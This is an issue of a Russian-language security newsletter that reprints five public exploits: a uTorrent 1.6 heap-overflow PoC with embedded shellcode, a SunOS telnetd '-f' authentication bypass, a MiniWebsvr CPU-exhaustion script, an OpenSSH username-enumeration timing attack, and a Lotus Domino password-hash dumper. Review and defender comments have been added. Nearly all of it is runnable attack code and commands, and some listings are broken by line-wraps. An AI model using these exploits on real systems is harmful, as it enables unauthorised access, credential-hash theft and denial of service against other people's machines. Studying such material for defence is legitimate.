
Компьютер для продвинутых пользователей. Выпуск по безопасности. Exploits.


Компьютер для продвинутых пользователей
В этом выпуске:
uTorrent 1.6 | SunOS 5.10 | Portable OpenSSH <= 3.6.1p-PAM |
ПО: uTorrent 1.6 Exploit:
/*
* This is a PoC remote exploit for uTorrent 1.6
*
* Author:
* defsec <defacedsecurity@hotmail.com>
* http://www.defacedsecurity.com
*
*
* Works on XP SP1 and  w2k sp1-4
*
*/

#include <stdio.h>
#include <stdlib.h>

#define NASIZE 4880   /* byte length of the crafted header placed in front of the kept torrent tail */

/* Crafted "announce" header, assembled byte by byte in main(): the bencoded
 * prefix "d8:announce4864:", 0x90 filler, xorops, shellcode and jmptosc at
 * fixed offsets. Written verbatim to output.torrent.
 * NOTE(review): main() uses strstr/strcpy/memcpy, but only <stdio.h> and
 * <stdlib.h> are included above — <string.h> is missing. */
unsigned char nice_announce[NASIZE];
/* Four bytes copied in front of the shellcode (at offset 84). The name suggests
 * register-clearing x86 xor instructions; the bytes are not decoded or verified here. */
unsigned char xorops[]="\x33\xc0\x33\xdb";

// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
// Payload bytes exactly as shipped with the PoC: 21 rows of 16 plus a final
// row of 7 = 343 bytes, matching Size=343 in the generator line above. Per that
// line the payload's effect is to start calc (NOTE(review): not decoded or
// verified here). main() copies it into nice_announce right after xorops.
unsigned char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x46\x42\x30\x5a";

//msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for win2k sp3/sp4
// 20 bytes in total (2 + 4 + 14), exactly the range main() copies into
// nice_announce[4438..4457]. Laid out as the comment above describes: a short
// two-byte prefix, the 4-byte msvcrt.dll address the platform-specific comment
// refers to, then a stub that — per the array's name — transfers control to
// the shellcode. The stub bytes are not decoded here.
unsigned char jmptosc[] = "\xeb\x04\
\xa7\x2c\xc2\x77\
\x33\xc0\xb0\x11\xc1\xe0\x08\x5b\x5b\x5b\x2b\xd8\xff\xe3";

/*
 * Program entry point.
 *
 * Reads the torrent file named by argv[1], keeps everything from its
 * "7:comment" key onwards, prepends the crafted header assembled in
 * nice_announce[] and writes the result to "output.torrent" in the current
 * directory. Returns 0 on a usage or I/O error and 1337 on success.
 *
 * Defender note: the generated file declares an announce value of 4864 bytes
 * ("d8:announce4864:"); an announce string anywhere near that length is an
 * easy anomaly for a torrent-file parser or content scanner to reject.
 *
 * NOTE(review): defects left as in the original:
 *  - the banner printf's string literal is wrapped across two lines in this
 *    listing, so the listing does not compile until it is rejoined;
 *  - curptr from strstr(alptr, "7:comment") is not checked for NULL before
 *    the pointer arithmetic that follows;
 *  - buffer holds exactly lSize bytes and no terminating NUL, so strstr() on
 *    it can read past the allocation;
 *  - the 0x90 fill loop runs lPtrIndex up to 4864+16 == NASIZE inclusive and
 *    writes one byte past the end of nice_announce[];
 *  - result (size_t) is compared with lSize (long); a negative ftell() result
 *    is never handled;
 *  - buffer, torrentTail and the final curptr are never freed (the process
 *    exits right after, so harmless here);
 *  - <string.h> is not included although strstr/strcpy/memcpy are used.
 */
int main(int argc,char *argv[])
{
    FILE * pFile;
    long lSize;
    char * buffer;
    size_t result;

    long i = 0;
    long j = 0;
    long lPtrIndex;      /* write cursor into nice_announce */
    long lHeadSize;      /* bytes of the input before "7:comment" (discarded) */
    long lTailSize;      /* bytes from "7:comment" to end of input (kept) */
    char * curptr;
    char * alptr;
    char * torrentTail;
    
    /* Usage banner when no torrent file is given. */
    if (argc < 2)
    {
        printf("\n[uTorrent 1.6] Heap Overflow Exploit - by 
[DEFACEDSECURITY]");
        printf("\n\nUsage: ");
        printf("%s",argv[0]);
        printf(" <TorrentFile>\n");
        return 0;
    }
    
    /* Read the whole input torrent into memory. */
    pFile = fopen (argv[1],"rb");
    if (pFile==NULL)
    {
        fputs ("File error",stderr);
        return 0;
    }

    // obtain file size:
    fseek (pFile ,0,SEEK_END);
    lSize = ftell (pFile);
    rewind (pFile);

    // allocate memory to contain the whole file:
    // (no room for a terminating NUL — see the review notes above)
    buffer = (char*) malloc (sizeof(char)*lSize);
    if (buffer == NULL)
    {
        fputs ("Memory error",stderr);
        return 0;
    }

    // copy the file into the buffer:
    result = fread (buffer,1,lSize,pFile);
    if (result != lSize)
    {
        fputs ("Reading error",stderr);
        return 0;
    }

    fclose (pFile);

    /* find announce / announce-list and erase it */
    /* "announce" only serves as a sanity check that this is a torrent; the
     * split point is the "7:comment" key found after it. */
    alptr = (char *) strstr(buffer,"announce");
    if (alptr == NULL)
    {
        printf("\ninvalid torrent file");
        return 0;
    }

    /* NOTE(review): curptr may be NULL here if the input has no "7:comment" key. */
    curptr = (char *) strstr(alptr, "7:comment");
    lHeadSize = curptr - buffer ;
    lTailSize = lSize - lHeadSize;

    /* Keep a private copy of everything from "7:comment" to end of file. */
    torrentTail = (char *) malloc (sizeof(char)*lTailSize);
    memcpy(torrentTail,curptr,lTailSize);

    /* generate offending header */
    /* Layout of nice_announce (byte offsets):
     *   0..15      "d8:announce4864:" — bencoded dict whose announce string is
     *              declared as 4864 bytes long;
     *   16..4880   0x90 filler (NOTE(review): 4880 == NASIZE is one past the end);
     *   84..87     xorops;
     *   88..430    shellcode (343 bytes);
     *   4438..4457 jmptosc (20 bytes). */
    strcpy(nice_announce,"d8:announce4864:");
    for (lPtrIndex = 16; lPtrIndex <= 4864+16; lPtrIndex++)
        nice_announce[lPtrIndex] = 0x90;
    lPtrIndex = 84;
    memcpy(nice_announce + lPtrIndex ,xorops,sizeof(xorops)-1);
    lPtrIndex += sizeof(xorops) -1;
    memcpy(nice_announce+lPtrIndex,shellcode, sizeof(shellcode)-1);
    for (lPtrIndex = 4438; lPtrIndex<4458; lPtrIndex++,i++)
        nice_announce[lPtrIndex] = jmptosc[i];

    /* get head and tail together into a file */
    /* Concatenate the crafted header and the kept tail with plain byte loops;
     * i is reused as the output cursor, j indexes torrentTail. */
    curptr = (char *) malloc(sizeof(char)*(NASIZE+lTailSize));
    for (i=0;i<NASIZE;i++)
        curptr[i] = nice_announce[i];
    for (;i<(NASIZE+lTailSize);i++,j++)
        curptr[i] = torrentTail[j];

    /* write to file and exit */
    /* Output always goes to a fixed name in the current directory. */
    pFile = fopen ( "output.torrent" , "wb" );
    if (pFile==NULL)
    {
        fputs ("File error",stderr);
        return 0;
    }
    fwrite(curptr, sizeof(char), (NASIZE+lTailSize), pFile);
    fclose (pFile);

    /* Non-zero exit status even on success. */
    return 1337; //:)
}

ПО: SunOS 5.10

Exploit:
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
# Flow: banner, argument-count check, then a single telnet login attempt
# against $1 with the login name derived from $2.
# NOTE(review): the banner echo below is wrapped across two lines in this
# listing (its closing quote is on the next line), so the script as printed
# does not run until that line is rejoined.
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope 
kingcope@gmx.net"
# Exactly two positional arguments are required: <host> <account>. Any other
# count prints the two usage lines and exits (status of the last echo, 0).
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
# The only network action: telnet to $1 with the -l (login name) option set to
# "-f<account>". What the remote in.telnetd does with a login name beginning
# with "-f" is server-side behaviour not shown here; the script relies on it.
# Defenders: a telnet login name starting with "-f" in telnetd/login logs is
# the observable signature of this probe; patched in.telnetd, or retiring
# telnet in favour of ssh, removes the exposure.
telnet -l"-f$2" $1
==================================================================
ПО: MiniWebsvr <= 0.0.6

import socket

# Banner. NOTE(review): in this listing the `print` keyword and its separator
# string were wrapped onto separate lines, so as written the bare `print`
# emits an empty line and the string on the following line is a no-op
# expression statement (Python 2 syntax throughout).
print
"-----------------------------------------------------------------------"
print "MiniWebsvr 0.0.6 (0-Day) Resource Consumption"
print "url: http://miniwebsvr.sourceforge.net/"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "Run this exploit and take a look to the CPU usage."
print
"-----------------------------------------------------------------------"

# Target is hard-coded: the local machine on the default HTTP port.
host = "127.0.0.1"
port = 80

# NOTE(review): this socket is created but never connected or closed; the loop
# below opens its own connection on every iteration.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Send three copies of a non-conforming GET for /prn.htm (trailing space before
# the line break, bare "\n" rather than CRLF, no Host header), never reading the
# reply or closing the connection, and print the iteration index. The path
# component resembles a Windows reserved device name (PRN); the banner attributes
# the CPU consumption to how the server handles that request — not verified here.
# Defender note: repeated requests for device-name paths from one client are the
# observable pattern; rejecting reserved names at the server is the usual fix.
try:
   for i in range (0,3):
       request =  "GET /prn.htm HTTP/1.1 \n\n"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       print i
# NOTE(review): the bare except hides every error, including programming
# errors, behind a single connection-failure message.
except:
   print "Unable to connect. exiting."

ПО: Portable OpenSSH <= 3.6.1p-PAM
Exploit:
#!/bin/bash

#
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
#
# raptor_sshtime - [Open]SSH remote timing attack exploit
# Copyright (c) 2006 Marco Ivaldi 
#
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
# sends an error message when a user does not exist, which allows remote
# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
#
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
# and possibly under limited configurations, allows remote attackers to
# determine valid usernames via timing discrepancies in which responses take
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
# NOTE: as of 20061014, it appears that this issue is dependent on the use of
# manually-set passwords that causes delays when processing /etc/shadow due to
# an increased number of rounds (CVE-2006-5229).
#
# This is a simple shell script based on expect meant to remotely analyze
# timing differences in sshd "Permission denied" replies. Depending on OpenSSH
# version and configuration, it may lead to disclosure of valid usernames.
#
# Usage example:
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#

# Fixed settings: SSH port used for every probe.
port="22"

# Positional arguments: target host and wordlist path (the second is checked
# for emptiness further down).
host="$1"
dict="$2"

# Local functions
head() {
    # Banner printed before the usage text, the error text and the run itself.
    # NOTE(review): the name shadows the coreutils `head` utility for the rest
    # of this script.
    printf '\n%s\n%s\n\n' \
        "raptor_sshtime - [Open]SSH remote timing attack exploit" \
        "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
}

foot() {
    # Trailing blank line, then terminate the whole script with status 0.
    printf '\n'
    exit 0
}
    
usage() {
    # Banner, reminder about the host key, invocation help, then exit 0 via foot.
    head
    printf '%s\n\n%s\n%s\n' \
        "[make sure the target hostkey has been approved before]" \
        "usage  : ./sshtime <target> <wordlist>" \
        "example: ./sshtime 192.168.0.1 dict.txt"
    foot
}

notfound() {
    # Banner plus the "expect is missing" error, then exit 0 via foot.
    head
    printf '%s\n' "error  : expect interpreter not found!"
    foot
}

# Check if expect is there
# notfound() prints an error and exits when `which` fails.
expect=`which expect 2>/dev/null`
if [ $? -ne 0 ]; then
    notfound
fi

# Input control
# NOTE(review): only the wordlist argument is tested; an empty $1 with a
# non-empty $2 passes and reaches the loop with host="".
if [ -z "$2"  ]; then
    usage
fi

# Perform the bruteforce attack
# `head` here is the banner function defined above, not coreutils head.
head

# For every word in the wordlist: print user@host, spawn ssh under expect,
# answer the password prompt with "dummy", and keep only the `real` line of
# `time -p` as the measured response time.
# NOTE(review): the unquoted `cat $dict` output is word-split, so entries
# containing whitespace are treated as several users.
# NOTE(review): $host, $user and $port are interpolated unquoted into the
# expect -c program string, so wordlist entries containing Tcl/expect
# metacharacters alter or break the generated program.
# NOTE(review): the time/expect command is one line wrapped across three in
# this listing; as printed the shell sees an unterminated quoted string.
# Defender note: on the wire this is one ssh connection per wordlist entry
# from a single client, each failing immediately after one password attempt;
# sshd's auth log records one failed attempt per entry.
for user in `cat $dict`
do
    echo -ne "$user@$host\t\t"
    (time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l 
$user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof 
{exit}}") 2>&1 | grep real
done

# Blank line and exit 0.
foot

ПО: Lotus Domino <= R6
Exploit:
#!/bin/bash

#
# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $
#
# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump
# Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled,
# stores sensitive data from names.nsf in hidden form fields, which allows
# remote attackers to read the HTML source to obtain sensitive information such
# as (1) the password hash in the HTTPPassword field, (2) the password change
# date in the HTTPPasswordChangeDate field, (3) the client platform in the
# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and
# (5) the client Lotus Domino release in the ClntBld field, a different
# vulnerability than CVE-2005-2696 (CVE-2005-2428).
#
# According to testing, it's possible to dump all HTTPPassword hashes using the
# $defaultview view instead of $users. This saves a considerable amount of time.
#
# The code may require some changes to properly work with your configuration.
#
# See also:
# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml
#
# Usage:
# $ ./raptor_dominohash 192.168.0.202
# [...]
# Extracting the view entries...
# Done! 656 unique entries have been found.
# Now ready to dump password hashes...
# [...]
# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3]
# FirstName:      Foo
# LastName:       Bar
# ShortName:      fbar
# HTTPPassword:   (355E98E7C7B59BD810ED845AD0FD2FC4)
# [...]
#
# Vulnerable platforms:
# Lotus Domino R6 Webmail [tested]
# Lotus Domino R5 Webmail [untested]
# Lotus Domino R4 Webmail? [untested]
#

# Paging cursor for the Readviewentries requests (advanced further down).
i="1"
# Scratch files, created in the current working directory.
# NOTE(review): fixed, predictable names; in a shared or world-writable
# directory this is a symlink-following hazard — mktemp(1) is the usual fix.
tmp1="dominohash1.tmp"
tmp2="dominohash2.tmp"

# Target host from the command line (checked for emptiness further down).
host="$1"

# Local fuctions
header() {
    # Banner printed before the usage text, the error text and the run itself.
    printf '\n%s\n%s\n\n' \
        "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump" \
        "Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>"
}

footer() {
    # Trailing blank line, then terminate the whole script with status 0.
    printf '\n'
    exit 0
}

usage() {
    # Banner and invocation help, then exit 0 via footer.
    header
    printf '%s\n%s\n' \
        "usage  : ./raptor_dominohash <host>" \
        "example: ./raptor_dominohash 192.168.0.202"
    footer
}

notfound() {
    # Banner plus the "curl is missing" error, then exit 0 via footer.
    header
    printf '%s\n' "error  : curl not found"
    footer
}

# Check if curl is there
# notfound() prints an error and exits when `which` fails. The $curl variable
# set here is not used later; the loops below call `curl` by name.
curl=`which curl 2>/dev/null`
if [ $? -ne 0 ]; then
    notfound
fi

# Input control
if [ -z "$1"  ]; then
    usage
fi

# Remove temporary files
# NOTE(review): fixed-name scratch files in the current directory, removed and
# recreated unconditionally — a symlink-following hazard in a shared directory.
rm -f $tmp1
rm -f $tmp2

header

# Extract the view entries
# Page through the $defaultview Readviewentries output, advancing Start by 30
# per request, and append every line containing "unid" to $tmp1; stop when
# grep finds nothing.
# NOTE(review): the status tested is grep's (last command of the pipeline), so
# an unreachable host or HTTP error also ends as "no match" and leaves the
# loop silently.
# NOTE(review): the curl command is one line wrapped across three in this
# listing.
echo "Extracting the view entries..."
while :
do
    curl 
"http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 
2>/dev/null | grep unid >> $tmp1

    # Check grep return value
    if [ $? -ne 0 ]; then
        break
    fi

    # Go for the next page
    i=`expr $i + 30`
    echo -ne "\b\b\b\b\b\b\b\b$i"
done

# Pull the value of every unid="..." attribute, de-duplicate into $tmp2
# (one line wrapped across two in this listing).
cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort 
| uniq > $tmp2

# Check if some view entries have been found
if [ ! -s $tmp2 ]; then
    echo "No entries found on host ${host}!"
    footer
fi
echo -ne "\b\b\b\b\b\b\b\bDone! "
echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found."
echo ""

# Perform the hash dumping
# For each UNID, request the document with ?OpenDocument and print the
# FirstName, LastName, ShortName and HTTPPassword values carried in hidden
# <input> fields, one "name:<tab>value" line each.
# Defender note: per the header, these fields are only emitted when
# "Generate HTML for all fields" is enabled — disabling it is the mitigation.
# The activity pattern is sequential Readviewentries&Start=N requests followed
# by one OpenDocument request per UNID, all from a single client.
# NOTE(review): the curl pipeline is one line wrapped across four in this
# listing.
echo "Now ready to dump password hashes..."
echo ""
sleep 4
for unid in `cat $tmp2`
do
    echo "[http://${host}/names.nsf/\$defaultview/${unid}]"
    echo ""
    #curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FullName"|"HTTPPassword"'
    curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 
2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' 
| awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' 
'{print $1 ":\t" $2}' | tr -d '">'
    echo ""
done

# Blank line and exit 0. The scratch files are left behind.
footer
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru
